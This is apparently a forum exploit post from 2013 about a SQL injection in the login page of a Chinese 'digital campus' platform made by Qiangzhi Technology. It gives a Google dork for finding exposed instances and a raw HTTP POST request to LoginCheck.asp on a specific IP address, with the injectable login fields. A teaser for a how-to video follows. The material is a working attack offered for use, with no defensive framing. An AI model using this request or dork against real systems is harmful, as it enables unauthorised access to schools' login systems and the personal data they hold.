# Exploit Title: 数字校园平台--强智科技 POST INJECTION
# Date: 11/01/2013
# Vendor Homepage: http://www.qzdatasoft.com/
# Google dork: title:数字校园平台--湖南强智科技发展有限责任公司# Exploit
ccode('POST /JwGl/LoginCheck.asp?datetime=2013-11-01%2012:38:15 HTTP/1.1
Host: 61.183.19.35
Proxy-Connection: keep-alive
Content-Length: 142
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://61.183.19.35
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1659.2 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://61.183.19.35/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8,zh;q=0.6,zh-CN;q=0.4,zh-TW;q=0.2
Cookie: ASPSESSIONIDCACQSQAA=LFPFCFJBOGKMIMMEPHMOIBBM; CurrQzjiaowuLoginLb=; OpenWindow=
logindate=&LoginLb=jzg&x=14&y=20&Account=s&PassWord=%5E&CheckCode=3246&AccessID=20131101123815.1921198&DiskNumber=&EnRndNum=418260&dogcode=')
HERE HAVE A VEDIOS TELL U HOW TO USE POST INJECTION(回帖可见):
[ 此帖被在2014-10-11 19:05重新编辑 ]